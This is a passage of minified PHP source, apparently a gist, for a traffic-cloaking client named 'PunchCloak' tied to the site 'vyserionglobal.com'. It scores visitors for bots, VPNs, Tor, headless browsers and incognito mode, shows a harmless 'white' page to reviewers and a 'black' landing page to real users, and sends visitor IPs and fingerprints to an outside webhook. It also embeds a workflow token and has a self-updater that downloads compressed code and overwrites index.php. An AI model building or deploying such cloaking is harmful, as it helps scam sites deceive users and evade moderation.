isUser=$isUser;}public function build():array{$contentDir=$this -> getContentDir();$page=$this -> getPage();$urlPath=$this -> getUrlPath($page);$query=http_build_query($this -> request -> queryParams);$query=$query?"?{$query}":'';$path=null;if(!empty($page)&&(strpos($page,'http')===0||strpos($page,'https')===0)){\Client\Logger :: info("Curl page: {$page}");$url=rtrim($page,'/')."/".trim($urlPath,'/').$query;}else{$path=str_replace('//','/',"{$contentDir}/$urlPath");$path=str_replace('%2F','/',urlencode($path));$url="{$this -> request -> scheme}://{$this -> request -> host}/{$path}{$query}";}return['method'=>$this -> request -> method,'host'=>$this -> request -> host,'scheme'=>$this -> request -> scheme,'url'=>$url,'path'=>$path,'contentDir'=>$contentDir,'page'=>$page,'urlPath'=>$urlPath,'query'=>$query,];}private function getContentDir():string{$contentDir=(string)($this -> isUser?$this -> config -> get('land_dir_name'):$this -> config -> get('white_dir_name'));if(!$contentDir&&file_exists('white')){return 'white';}return $contentDir;}private function getPage():string{return (string)($this -> isUser?$this -> config -> get('land_page'):$this -> config -> get('white_page'));}private function getUrlPath(string $page):string{if(empty($this -> request -> urlPath)||$this -> request -> urlPath==='/'){if(!empty($page)&&(strpos($page,'http')===false||strpos($page,'https')===false)){return(strpos($page,'/')===false)?("/".$page):$page;}}return $this -> request -> urlPath;}}class VisitorLogger{private \Client\Config $config;private \Client\Http\Request $request;private array $apiResponse;private array $reason;private bool $isUser;private string $requestFingerprint;private WebhookService $webhookService;public function __construct(\Client\Config $config,\Client\Http\Request $request,array $apiResponse,array $reason,bool $isUser,string $requestFingerprint){$this -> config=$config;$this -> request=$request;$this -> apiResponse=$apiResponse;$this -> reason=$reason;$this -> isUser=$isUser;$this -> requestFingerprint=$requestFingerprint;$this -> webhookService=new \Client\Services\WebhookService($config,$request);}public function logVisit():void{$response=\Client\PunchAPI :: saveIpInfoToLog(['fingerprint'=>$this -> requestFingerprint,'host'=>$this -> request -> host,'raw_url'=>$this -> request -> urlPath,'url'=>$this -> request -> scheme.'://'.$this -> request -> host.'/'.$this -> request -> urlPath,'ip'=>$this -> request -> ipAddr,'user_agent'=>$this -> request -> userAgent,'referer'=>$this -> request -> referer,'country_code'=>$this -> request -> getCountryCode(),'not_passed_reason'=>implode(',',$this -> reason),'ip_info'=>$this -> apiResponse,'verdict'=>$this -> isUser?'user':'bot',]);\Client\Logger :: info("Logs was sent".json_encode($response));/*// Send webhook notification*/if($this -> config -> isWebhookEnabled()){$this -> webhookService -> sendVisitNotification($this -> apiResponse,$this -> reason,$this -> isUser,$this -> requestFingerprint);}if(!$this -> config -> isLoggingEnabled()){return;}$logFilePath=$this -> config -> getLogFilePath();if(!file_exists($logFilePath)){file_put_contents($logFilePath,'');}$logData=['date'=>date('Y-m-d H:i:s'),'workflow'=>WORKFLOW_ID,'ip'=>$this -> request -> ipAddr,'user_agent'=>$this -> request -> userAgent,'user_language'=>$this -> request -> userLanguage,'is_bot'=>!$this -> isUser?'yes':'no','reason'=>implode(',',$this -> reason),'referer'=>$this -> request -> referer,'page'=>$this -> isUser?'black':'white','country'=>$this -> request -> getCountryCode(),'ipqs_result'=>json_encode($this -> apiResponse),];if($visitDetails=\Client\Session :: getInstance()-> visit_details){$logData['visit_details']=json_encode(\Client\Session :: getInstance()-> visit_details);}$logLine=implode(' | ',array_map(fn($k,$v)=>"$k : $v",array_keys($logData),array_values($logData))).PHP_EOL;file_put_contents($logFilePath,$logLine,FILE_APPEND);}}class WebhookService{private \Client\Config $config;private \Client\Http\Request $request;public function __construct(\Client\Config $config,\Client\Http\Request $request){$this -> config=$config;$this -> request=$request;}/***Sendsawebhookwiththeprovideddata*/public function sendWebhook(array $data):bool{$webhookUrl=$this -> config -> get('webhook_url');if(empty($webhookUrl)){\Client\Logger :: info("Webhook URL is not configured. Skipping webhook sending.");return false;}try{$payload=$this -> preparePayload($data);$visitDetails=\Client\Session :: getInstance()-> visit_details;if(!empty($visitDetails)){$payload['visit_details']=json_encode($visitDetails);}\Client\Logger :: info("Sending webhook to: {$webhookUrl}");\Client\Logger :: info("Payload: ".json_encode($payload,JSON_UNESCAPED_UNICODE));$mh=curl_multi_init();$ch=curl_init();curl_setopt_array($ch,[CURLOPT_URL=>$webhookUrl,CURLOPT_RETURNTRANSFER=>true,CURLOPT_POST=>true,CURLOPT_POSTFIELDS=>json_encode($payload),CURLOPT_HTTPHEADER=>['Content-Type: application/json','User-Agent: PunchCloak-Client/1.0','X-PunchCloak-Workflow: '.$this -> config -> workflow_id,'X-PunchCloak-Verdict: '.($data['verdict']?? NULL)?:(($data['is_user']?? NULL)?'user':'bot'),],CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,]);curl_multi_add_handle($mh,$ch);$running=null;do{curl_multi_exec($mh,$running);curl_multi_select($mh);/*// Wait for activity on handles*/}while($running>0);$response=curl_multi_getcontent($ch);$httpCode=curl_getinfo($ch,CURLINFO_HTTP_CODE);$error=curl_error($ch);curl_multi_remove_handle($mh,$ch);curl_multi_close($mh);if($error){\Client\Logger :: warn("Error sending webhook: {$error}");return false;}if($httpCode>=200&&$httpCode<300){\Client\Logger :: info("Webhook successfully sent, HTTP code: {$httpCode}");return true;}else{\Client\Logger :: warn("Webhook sent failed, HTTP code: {$httpCode}, response: {$response}");return false;}}catch(\Throwable $e){\Client\Logger :: warn("An exception occurred while sending a webhook: ".$e -> getMessage());return false;}}/***Preparesthepayloadforthewebhook*/private function preparePayload(array $data):array{$basePayload=['timestamp'=>time(),'datetime'=>date('Y-m-d H:i:s'),'workflow_name'=>$this -> config -> getWorkflowName(),'workflow_id'=>$this -> config -> workflow_id,'ip'=>$this -> request -> ipAddr,'user_agent'=>$this -> request -> userAgent,'user_language'=>$this -> request -> userLanguage,'referer'=>$this -> request -> referer,'host'=>$this -> request -> host,'url'=>$this -> request -> scheme.'://'.$this -> request -> host.$this -> request -> urlPath,'url_path'=>$this -> request -> urlPath,'query_params'=>$this -> request -> queryParams,'country_code'=>$this -> request -> getCountryCode(),'fingerprint'=>$data['fingerprint']?? '','result'=>$data['verdict']==='bot'?'white':'black','verdict'=>$data['verdict']?? 'unknown','is_user'=>$data['is_user']?? false,'is_bot'=>$data['is_bot']?? false,'reason'=>$data['reason']?? '','ip_info'=>$data['ip_info']??[],'source'=>'client',];/*// Additional data if available*/if($this -> config -> get('webhook_include_config',false)){$basePayload['config']=$this -> config -> all();}else{unset($basePayload['config']);}return $basePayload;}/***Sendsavisitnotificationtothewebhook*/public function sendVisitNotification(array $apiResponse,array $reason,bool $isUser,string $requestFingerprint):bool{return $this -> sendWebhook(['fingerprint'=>$requestFingerprint,'verdict'=>$isUser?'user':'bot','is_user'=>$isUser,'is_bot'=>!$isUser,'reason'=>$reason,'ip_info'=>$apiResponse,]);}}class CacheManager{private bool $enabled;private string $cacheDir;private \Client\Session $session;public function __construct(){$this -> session=\Client\Session :: getInstance();$this -> cacheDir='./.punchcloak';$this -> enabled=$_SERVER['REQUEST_METHOD']==='GET';$this -> initCache();}public function purge():int{$deleted=0;if(!is_dir($this -> cacheDir)){\Client\Logger :: warn("Cache directory does not exist: {$this -> cacheDir}");return 0;}$files=glob($this -> cacheDir.'/cache_*');foreach($files as $file){if(is_file($file)){@unlink($file);$deleted++;}}\Client\Logger :: info("Cache purged: {$this -> cacheDir}");return $deleted;}private function initCache():void{\Client\Logger :: info("Cache enabled: {$this -> enabled}; cache dir: {$this -> cacheDir}");if(!($path=realpath($this -> cacheDir))){$path=$this -> cacheDir;}$this -> cacheDir=$path;if(!file_exists($this -> cacheDir)&&!is_dir($this -> cacheDir)){if(@mkdir($this -> cacheDir,0777,true)){\Client\Logger :: info("Cache directory created: {$this -> cacheDir}");}else{\Client\Logger :: warn("Failed to create cache directory: {$this -> cacheDir}");}}}public function isEnabled(string $key):bool{return $this -> enabled&&\Client\Services\ContentFetcher :: isAsset($key);}public function get(string $key):?string{$cacheFile=$this -> getCacheFilePath($key);if(!file_exists($cacheFile)){return null;}if(!$this -> isCacheValid($cacheFile)){unlink($cacheFile);return null;}return file_get_contents($cacheFile);}public function set(string $key,string $content):void{if($this -> isEnabled($key)){file_put_contents($this -> getCacheFilePath($key),$content);}}private function getCacheFilePath(string $key):string{$cacheKey='cache_'.$this -> getCacheKey($key);if(!($path=realpath($this -> cacheDir.'/'.$cacheKey))){$path=$this -> cacheDir.'/'.$cacheKey;}return $path;}private function isCacheValid(string $cacheFile):bool{$cacheTime=filemtime($cacheFile);$maxAge=3600;/*// 1 hour*/return(time()-$cacheTime)<$maxAge;}private function getCacheKey(string $key):string{$str=$key.$this -> session -> getId().$_GET['_url_']?? '/';return hash('crc32',$str,false);}}}namespace Client\Http{class Request{public string $ipAddr;public string $userAgent;public string $userLanguage;public string $referer;public string $urlPath;public string $host;public string $scheme;public string $method;public array $queryParams;private $query=[];private $body=[];private $headers=[];private $cookies=[];private $files=[];private $server=[];public static function getInstance():self{static $instance=null;if(is_null($instance)){$instance=new self();}return $instance;}public function getQuery():array{return $this -> query;}public function getBody():array{return $this -> body;}public function getHeaders():array{return $this -> headers;}public function getCookies():array{return $this -> cookies;}public function getFiles():array{return $this -> files;}public function getServer():array{return $this -> server;}public function getParam(string $name,$default=null){return $this -> query[$name]?? $default;}public function getBodyParam(string $name,$default=null){return $this -> body[$name]?? $default;}public function getHeader(string $name,$default=null){return $this -> headers[$name]?? $default;}public function getCookie(string $name,$default=null){return $this -> cookies[$name]?? $default;}public function getFile(string $name,$default=null){return $this -> files[$name]?? $default;}public function getServerParam(string $name,$default=null){return $this -> server[$name]?? $default;}public function isMethod(string $method):bool{return strtoupper($this -> method)===strtoupper($method);}public function isAjax():bool{return $this -> getHeader('X-Requested-With')==='XMLHttpRequest';}/***Returnstherawbodyoftherequest.**@returnstring*/public function getRawBody():string{return file_get_contents('php://input');}/***Getsa"parameter"valuefromany_GETor_POST.**Orderofprecedence:GET,POST*/public function get(string $key,$default=null){if(array_key_exists($key,$this -> query)){return $this -> query[$key];}if(array_key_exists($key,$this -> body)){return $this -> body[$key];}return $default;}public function __construct(){$this -> query=$_GET;$this -> body=$_POST;$this -> headers=getallheaders();$this -> cookies=$_COOKIE;$this -> files=$_FILES;$this -> server=$_SERVER;$this -> ipAddr=$_SERVER['HTTP_CF_CONNECTING_IP']?? $_SERVER['HTTP_X_FORWARDED_FOR']?? $_SERVER['REMOTE_ADDR'];$this -> userAgent=$_SERVER['HTTP_USER_AGENT']?? '';$this -> userLanguage=$_SERVER['HTTP_ACCEPT_LANGUAGE']?? '';$this -> referer=$_SERVER['HTTP_REFERER']?? '';$this -> urlPath=$_GET['_url_']?? '/';$this -> host=$this -> resolveHost();$this -> scheme=$_SERVER['HTTP_X_FORWARDED_PROTO']??($_SERVER['REQUEST_SCHEME']?? 'http');$this -> method=$_SERVER['REQUEST_METHOD'];$this -> queryParams=$_GET;unset($this -> queryParams['_url_']);\Client\Logger :: info("Request parsed: IP={$this -> ipAddr}, UA={$this -> userAgent}, URL={$this -> urlPath}");}private function resolveHost():string{$host=$_SERVER['HTTP_HOST']?? $_SERVER['SERVER_NAME']?? $_SERVER['SERVER_ADDR']?? 'localhost';if(str_contains($host,':')){$parts=explode(':',$host);return reset($parts);}return $host;}public function getCountryCode():string{return $_SERVER['HTTP_CF_IPCOUNTRY']?? '';}}}namespace Client\Tasks{class CacheCleaner{public function execute():string{try{$session=\Client\Session :: getInstance();$cacheManager=new \Client\Services\CacheManager();\Client\Logger :: info("CacheCleaner: cache files removed: {$cacheManager -> purge()}");\Client\Logger :: info("CacheCleaner: session files removed: {$session -> purge()}");return "Cache cleared successfully.";}catch(\Throwable $e){\Client\Logger :: error("CacheCleaner: Error while clearing cache: ".$e -> getMessage()."\n".$e -> getTraceAsString());return "Error while clearing cache: ".$e -> getMessage();}}public static function run():void{$task=new self();$task -> execute();}public function __serialize():array{return[];}public function __unserialize(array $data):void{}}class SelfUpdater{private string $updateUrl;private string $localFile;private string $lockFile;private string $backupFile;private string $tmpFile;private int $lockTtl=300;public function __construct(string $updateUrl){$this -> updateUrl=$updateUrl;$this -> setUp('index.php');}private function setUp(string $targetFile):void{$this -> localFile=$targetFile;$this -> backupFile=$targetFile.'.bak';$this -> tmpFile=$targetFile.'.tmp';$this -> lockFile=dirname($targetFile).'/.update.lock';}public function execute():string{if($this -> isLocked()){$this -> log("The update is already running in another process.");return "Update is already in progress.";}$this -> lock();try{$updatedCode=file_get_contents($this -> updateUrl);if($updatedCode===FALSE){throw new \RuntimeException("Unable to download update.");}$updatedCode=gzinflate($updatedCode);$currentHash=sha1_file($this -> localFile);$remoteHash=sha1($updatedCode);if($currentHash===$remoteHash){$this -> log("Latest version already installed.");return "Latest version already installed.";}if(!copy($this -> localFile,$this -> backupFile)){throw new \RuntimeException("Unable to create backup file.");}if(file_put_contents($this -> tmpFile,$updatedCode)===false){throw new \RuntimeException("Unable to write updated code to temporary file.");}if(!rename($this -> tmpFile,$this -> localFile)){throw new \RuntimeException("Unable to replace the local file with the updated code.");}$this -> log("Successfully updated. The new version will be used for the next HTTP request.");\Client\Tasks\CacheCleaner :: run();return"Update successful. New version sha1: {$remoteHash}.";}catch(\Throwable $e){$this -> log("Error: ".$e -> getMessage());$this -> rollback();return $e -> getMessage()." Rollback to the previous version.";}finally{$this -> unlock();}}private function isLocked():bool{if(!file_exists($this -> lockFile))return FALSE;[$ts,$pid]=explode(':',file_get_contents($this -> lockFile))+[0,0];$age=time()-(int) $ts;if($age>$this -> lockTtl||!$this -> isProcessAlive((int) $pid)){$this -> log("LOCK file is out of date, let's continue.");return FALSE;}return TRUE;}private function log(string $message):void{\Client\Logger :: info($message);if(php_sapi_name()==='cli'){echo $message.PHP_EOL;}}private function lock():void{file_put_contents($this -> lockFile,time().':'.getmypid());}private function unlock():void{if(file_exists($this -> lockFile))unlink($this -> lockFile);if(file_exists($this -> tmpFile))unlink($this -> tmpFile);if(file_exists($this -> backupFile))unlink($this -> backupFile);}private function rollback():void{if(!file_exists($this -> backupFile)){$this -> log("No backup found. Rollback not possible.");return;}$this -> log("Rolling back to backup...");copy($this -> backupFile,$this -> localFile);}private function isProcessAlive(int $pid):bool{return function_exists('posix_kill')&&posix_kill($pid,0);}public function __serialize():array{return['updateUrl'=>$this -> updateUrl,];}public function __unserialize($data):void{$this -> updateUrl=$data['updateUrl'];$this -> setUp(__FILE__);}}}namespace{if(isset($_SERVER['HTTP_UPGRADE'])&&strtolower($_SERVER['HTTP_UPGRADE'])==='websocket'){header("HTTP/1.1 400 Bad Request");exit;}const BASE_DIR=__DIR__;const WORKFLOW_ID=21;const WORKFLOW_TOKEN='iQspmjA37LephY2MV8Q7O0VSC98yubCDNpfxIdwwNZLZvMLHeMGuud2b8SZMq8EO';const WORKFLOW_STATUS='active';/**ignore*/const ORIGINAL_CONFIG=array('include_type'=>1,'white_dir_name'=>'white','land_dir_name'=>'land','country'=>array(0=>'WW',),'logging'=>true,'log_file'=>'/var/log/punchcloak.log','land_page'=>NULL,'white_page'=>NULL,'ipqs_enabled'=>true,'ipqs_strictness'=>1,'ipqs_fraud_score'=>76,'check_proxy'=>true,'check_tor'=>true,'check_bot'=>true,'check_active_vpn'=>true,'check_active_tor'=>true,'check_vpn'=>true,'check_mobile'=>false,'check_is_crawler'=>true,'check_blacklisted_ips'=>false,'check_reverse_dns'=>true,'check_referer'=>false,'js_checks'=>true,'block_headless'=>true,'block_incognito'=>true,'webhook_url'=>'http://webhook.wrtc.pp.ua/2e954e21-7206-40be-9176-2bacde9ab82e?env=prod','workflow_name'=>'vyserionglobal.com',);$config=array_merge([],ORIGINAL_CONFIG);if(is_array($config['country']??[])){$config['country']=implode(',',$config['country']);}define('CONFIG',$config);use Client\CloakCore;$punchCloak=CloakCore :: init();$punchCloak -> makeAction();} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment